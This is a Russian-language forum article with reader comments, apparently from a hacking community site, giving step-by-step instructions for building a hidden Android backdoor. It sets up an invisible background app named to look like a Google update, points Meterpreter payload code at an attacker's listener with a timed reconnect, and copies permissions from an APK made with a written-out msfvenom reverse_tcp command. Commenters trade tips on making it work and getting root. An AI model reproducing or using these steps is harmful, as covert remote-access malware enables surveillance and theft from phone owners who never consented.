• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Статья Собираем скрытый троян на Android(persistence) Часть I

Привет с вами DarkNode
Вся инфа в ознокомительных целях,автор не несет ответственности за область ее применения!

Сегодня будем учиться делать скрытый троян|бекдор на андроид средствами разработки на Android Studio и используя исходник от Android Meterpreter Payload с дальнейшим закреплением в системе.

Что нам понадобится:

Android Studio и Android SDK офф_сайт( )
Android Meterpreter Payload source code (https://github.com/giovannicolonna/msfvenom-backdoor-android)
Ссылки так же будут в описании видео

Первый этап (Подготовительный):
Качаем SourceCode(исходник) метерпретора под андроид,ставим андроид студию и SDK (Этот момент я расписывать не буду
если у кого то возникнут трудности - стучитесь в личку)
(При установке SDK вы можете скачать пакеты AVD(Аndroid Virtual Device|Аднроид эмуляторов) для тестирования приложения на эмулированом устройстве,но как по мне то эти эмуляторы очень таки медленные и лучше тестировать на своем реальном девайсе или же использовать другой эмулятор (например genymotion или образы андроида для виртуалок) Ссылки на то как настроить студию с генимоушн или физическим девайсом я кину в конце статьи и в описания видео.
Ну я уже все скачал.Показывать процесс установки не буду.Опять же таки если трудности возникнут с установкой( но не должны))) ) -стучите личку.
Запускаем студию,создаем проект,даем ему имя. Выбираем минимальную версию API андроида,я выбрал IceCreamSandwich 4.0 так как
1.png

2.png

это самая распространенная версия Android по статистике разработчиков.
Выбираем приложения без активити (activity) -- это означает что при запуске не будет никаких
визуальных окон (activity) и приложения просто запуститься себе и будет висеть в фоне.
3.png



На этом подготовительный этап завершен
Подключить genymotion к Android Studio
Подключить реальный смартфон к Android Studio

Второй этап (Базовые настройки пейлоада)
Открываем наш проект в студии.
4.png

Далее распаковываем скаченный архив с гитхаба с исходниками метерпретера. Находим там папку \backdooredapk\ где лежат наши java файлы и перетаскиваем их в наш проект в андроид студии.
5.png

Далее первым шагом же изменим в файле payload.java ip адрес нашего листенера(нашей атакующей машины,где у нас запущен метаслоит)
6.png


Затем нам будет интересен файл MyIntentService.java,в котором мы сможем опционально задать интервал времени через которое наш бекдор будет конектиться к машине атакуищего.
(long half_an_hour = (3600)/(2); //время в секундах между каждой попыткой открыть новую meterpreter сессию " Я для демонстрации поставлю минуту" )
7.png


Далее нам понадобится AndroidManifest.xml из архива. Возьмем от туда пользовательские разрешение (user.permisions) и все что между тегами <application></application>
После того как мы копипасним пермишенс и апликейшн нам нужно будет опционально изменить(указать) имя активити(<activiyt>android:name) и имя службы(<Service>android:name)
8.png

9.png

Хотя студия сама нам это покажет что не нашла пути которое по дефолту был в тегах активити и сервиса(выделит их красным цветом).
Нужно заменить их (stage.metasploit.com на com.darknode.google_update в моем случае "путь(имя) к вашему проекту")

10.png

11.png



Но в манифесте (AndroidManifest.xml) из архива есть один небольшой косяк.После копипаста его в наш проект нужно добавить права(permisions),так как там не полный нужный нам список прав.
Для этого возьмем и реверснем апк созданный с помощью msfvenon:
msfvenom -p android/meterpreter/reverse_tcp lhost=айпи lport=порт r > ./meter.apk(хотя айпи и порт можно рандомный,нам нужен только манифест от туда)
12.jpg

13.jpg


Скопируем разрешение с манифеста в наш проект

14.png


15.png


Далее осталось подписать наше приложения.

16.png


17.png


Подписали) Ну что ж давайте протестим.))
18.png

19.jpg

20.jpg


21.jpg


22.jpg


На этом наш этап пока закончим.Продолжения следует в следующей статье(видео)
Всем спасибо.

 
M

MAdDog719

Ого статья, спасибо, очень интересно.
 
  • Нравится
Реакции: termit
X

xxxcrow

а как манифест из метасплойтовского апк вытащить?
 
X

xxxcrow

Потом
Код:
cd meter
leafpad AndroidManifest.xml
кстати, раз ты все еще тут :D у меня опять проблемы :D
во первых телефон не подключается(вечно с ним проблемы :D)
во вторых гредл что то ругается :D
и еще вот где ты сказал что заменить исходниковские названия на свои,
нихрена, все еще красным горят, ну вообще много что горит красным
(а еще вот у тебя как проект пустой создался, у меня не так с: )
(кароч, скинь исходники готовые хддд)

кароче, все, очень, плохо
245ef48557724fe6bcd8c9cf9c2adc13.png
 
Последнее редактирование модератором:
X

xxxcrow

Странно как все у вас. У меня Windows 10 . Все работает.
у меня вообще, сразу вот, создаешь пустой проект, заходишь в манифест и там уже красным помочена строка @стринг/апп_нейм

Странно как все у вас. У меня Windows 10 . Все работает.
и гредл пишет что на "1%" "не совместим с вашей системой"
 
Последнее редактирование модератором:

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 098
BIT
0
Попробуй переустановить, и проделать все шаги по новой.(Я могу предположить что у тебя что то неверно с путями)
Вот моя студия и информация о системе: Снимок.PNG
 
X

xxxcrow

Попробуй переустановить, и проделать все шаги по новой.(Я могу предположить что у тебя что то неверно с путями)
Вот моя студия и информация о системе:Посмотреть вложение 7815
да, я ставил в другие папки, и на другой диск, так как на дефолтном места очень мало
и дальше я все сдк и саму студию засунул в папку в корне типа: C://sdk (да у меня основной d)
да я потом просто поставлю на другую систему, слишком уж долго устанавливается студия, и первый раз долго грузится :D

Попробуй переустановить, и проделать все шаги по новой.(Я могу предположить что у тебя что то неверно с путями)
Вот моя студия и информация о системе:Посмотреть вложение 7815
все я кстати все сделал))) без напильника не обошлось))))
вот в конце, ты когда метасплойт запускаешь, ну слушатель и все такое
что ты там мутишь? я так понял автоматические скрипты при подключении сессии? как сделать? или что это?

я имею ввиду вот это, тоесть нужно создать фаил, и в него записать это? непонимаю
 
Последнее редактирование модератором:
B

Bafomet

какой смысл в этом трояне если для работы его на телефоне нужно еще получить рут-права, что крайне трудно

интересно а есть ли такие эмуляторы которые позволяют запустить ос любого телефона с конкр. прошивкой на компе и поколдовать с ним чтобы предварительно проверить не будет ли косяков?
 
Последнее редактирование модератором:
X

xxxcrow

интересно а есть ли такие эмуляторы которые позволяют запустить ос любого телефона с конкр. прошивкой на компе и поколдовать с ним чтобы предварительно проверить не будет ли косяков?
об этом писали в начале, можешь использовать андроид-сдк, либо эмулятор, к нему прикрутить образ андроида

какой смысл в этом трояне если для работы его на телефоне нужно еще получить рут-права, что крайне трудно
ну не все так просто, но вот я предлагаю два варианта, либо его системным делать, либо дирти ков провернуть

кстати, что бы рут запрашивал, надо: android.permission.ACCESS_SUPERUSER ?
 
Последнее редактирование модератором:
S

Samad

А что делает этот вирус крадет ли данные у пользователя?
 
D

Darius

Огонь статья. Нет ничего лучше самодельного отлаженного ПО, Спасибо!
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!